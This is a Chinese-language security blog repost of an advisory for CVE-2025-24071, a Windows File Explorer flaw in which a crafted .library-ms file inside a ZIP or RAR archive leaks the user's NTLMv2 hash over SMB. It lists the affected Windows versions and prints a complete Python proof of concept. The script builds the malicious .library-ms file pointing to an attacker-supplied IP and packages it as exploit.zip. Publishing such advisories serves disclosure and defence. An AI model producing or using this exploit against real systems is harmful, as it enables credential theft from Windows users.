CVE-2025-24071|Windows 文件资源管理器欺骗漏洞(POC)

admin 2025年3月30日20:54:24评论33 views字数 2473阅读8分14秒阅读模式

0x00 前言

Windows 文件资源管理器(File Explorer)是Windows操作系统的核心组件,主要用于浏览、管理和操作本地及网络文件、文件夹、驱动器等资源。它提供直观的图形化界面,支持文件创建、复制、移动、删除、重命名等基础操作,同时集成网络共享访问、外部设备管理、文件搜索与筛选等高级功能,是多任务文件处理的核心工具‌。

0x01 漏洞描述

Windows 资源管理器在解压包含特制 .library-ms 文件的 RAR/ZIP 存档时,会自动解析该文件内嵌的恶意 SMB 路径(如 \192.168.1.116shared),触发隐式 NTLM 认证握手,导致用户 NTLMv2 哈希泄露。

0x02 CVE编号

CVE-2025-24071

0x03 影响版本

Windows Server 2012 R2 (Server Core installation)Windows Server 2012 R2Windows Server 2016 (Server Core installation)Windows Server 2016Windows 10 Version 1607 for x64-based SystemsWindows 10 Version 1607 for 32-bit SystemsWindows 10 for x64-based SystemsWindows 10 for 32-bit SystemsWindows Server 2025Windows 11 Version 24H2 for x64-based SystemsWindows 11 Version 24H2 for ARM64-based SystemsWindows Server 202223H2 Edition (Server Core installation)Windows 11 Version 23H2 for x64-based SystemsWindows 11 Version 23H2 for ARM64-based SystemsWindows Server 2025 (Server Core installation)Windows 10 Version 22H2 for 32-bit SystemsWindows 10 Version 22H2 for ARM64-based SystemsWindows 10 Version 22H2 for x64-based SystemsWindows 11 Version 22H2 for x64-based SystemsWindows 11 Version 22H2 for ARM64-based SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows Server 2022 (Server Core installation)Windows Server 2022Windows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems

0x04 漏洞详情

POC:

https://github.com/0x6rss/CVE-2025-24071_PoC/

import osimport zipfiledef main():    file_name = input("Enter your file name: ")    ip_address = input("Enter IP (EX: 192.168.1.162): ")    library_content = f"""<?xml version="1.0" encoding="UTF-8"?><libraryDescriptionxmlns="http://schemas.microsoft.com/windows/2009/library">  <searchConnectorDescriptionList>    <searchConnectorDescription>      <simpleLocation>        <url>\\{ip_address}\shared</url>      </simpleLocation>    </searchConnectorDescription>  </searchConnectorDescriptionList></libraryDescription>"""    library_file_name = f"{file_name}.library-ms"    with open(library_file_name, "w", encoding="utf-8") as f:        f.write(library_content)    with zipfile.ZipFile("exploit.zip", mode="w", compression=zipfile.ZIP_DEFLATED) as zipf:        zipf.write(library_file_name)    if os.path.exists(library_file_name):        os.remove(library_file_name)    print("completed")if __name__ == "__main__":    main()

0x05 参考链接

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24071

原文始发于微信公众号(信安百科):CVE-2025-24071|Windows 文件资源管理器欺骗漏洞(POC)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月30日20:54:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2025-24071|Windows 文件资源管理器欺骗漏洞(POC)https://cn-sec.com/archives/3899496.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息